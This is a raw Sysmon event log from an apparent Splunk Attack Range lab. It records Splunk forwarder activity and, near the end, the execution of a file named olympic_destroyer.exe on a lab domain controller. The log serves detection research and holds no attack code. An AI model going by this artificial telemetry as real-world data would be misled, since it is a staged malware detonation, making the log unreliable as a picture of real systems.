AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000217338Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:47.446{4F8D34B0-1277-6216-7504-000000003902}3456764C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217337Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:47.212{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1277-6216-7504-000000003902}3456C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217336Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:47.212{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217335Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:47.212{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217334Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:47.212{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217333Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:47.212{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217332Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:47.212{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217331Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:47.212{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217330Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:47.212{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217329Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:47.212{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217328Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:47.212{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217327Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:47.212{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1277-6216-7504-000000003902}3456C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217326Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:47.212{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1277-6216-7504-000000003902}3456C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217325Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:47.213{4F8D34B0-1277-6216-7504-000000003902}3456C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000289447Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:48.837{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F460870726C95D27DD9A4A3420C2258,SHA256=8F0B564BF8A422F543BB7F2B509547DCC62915BFC43B08829BC19CEF94019D33,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217356Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:48.962{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E23A54CDBB73C79C665F9C96E4FEBF54,SHA256=CFA0640CBEC7458E12F801A00A7A70B8D9E4F68DD943DA1D16B9015BCEDA0FE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217355Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:48.228{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AF73E0CF39BDF1AC9A3BE17C8DBB1DE2,SHA256=9F669932A820819F0228EB71E52A4BB6898A063F700EBE823D0CBDA5AE43B3E5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217354Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:45.533{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51388-false10.0.1.12-8000- 354300x8000000000000000217353Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:45.517{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51387-false10.0.1.12-8089- 23542300x8000000000000000289458Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:49.856{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3EF6F4AFA976A6BB861D5709BFE015E,SHA256=0AFED67CE6460D5686082AFFD8CCBA2BEBF01DF6CF843F2C72273EA7580EC1FD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289457Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:49.590{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1279-6216-3905-000000003802}5896C:\Temp\olympic_destroyer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289456Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:49.590{C8EA50B7-F11F-6215-1400-000000003802}10481152C:\Windows\System32\svchost.exe{C8EA50B7-1279-6216-3905-000000003802}5896C:\Temp\olympic_destroyer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\pcasvc.dll+52e4|c:\windows\system32\pcasvc.dll+58a9|c:\windows\system32\pcasvc.dll+5b49|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+3534e|C:\Windows\System32\RPCRT4.dll+20cc7|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289455Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:49.590{C8EA50B7-F11F-6215-1400-000000003802}10481152C:\Windows\System32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1440C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+5bab|c:\windows\system32\pcasvc.dll+5b07|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+3534e|C:\Windows\System32\RPCRT4.dll+20cc7|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289454Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:49.574{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289453Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:49.574{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289452Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:49.574{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-1279-6216-3905-000000003802}5896C:\Temp\olympic_destroyer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000289451Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:49.574{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289450Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:49.574{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289449Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:49.574{C8EA50B7-F2AD-6215-C000-000000003802}48565268C:\Windows\Explorer.EXE{C8EA50B7-1279-6216-3905-000000003802}5896C:\Temp\olympic_destroyer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a90ff|C:\Windows\System32\windows.storage.dll+a8d75|C:\Windows\System32\windows.storage.dll+a8866|C:\Windows\System32\windows.storage.dll+a9cd8|C:\Windows\System32\windows.storage.dll+a868e|C:\Windows\System32\windows.storage.dll+ab4a5|C:\Windows\System32\windows.storage.dll+ab824|C:\Windows\System32\windows.storage.dll+aae60|C:\Windows\System32\windows.storage.dll+ad68a|C:\Windows\System32\windows.storage.dll+ad442|C:\Windows\System32\SHELL32.dll+3fa6d|C:\Windows\System32\SHELL32.dll+3e606|C:\Windows\System32\SHELL32.dll+80381|C:\Windows\System32\SHELL32.dll+6731e|C:\Windows\System32\SHELL32.dll+18cf1c|C:\Windows\System32\SHELL32.dll+18cc73|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000289448Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:49.580{C8EA50B7-1279-6216-3905-000000003802}5896C:\Temp\olympic_destroyer.exe-----"C:\Temp\olympic_destroyer.exe" 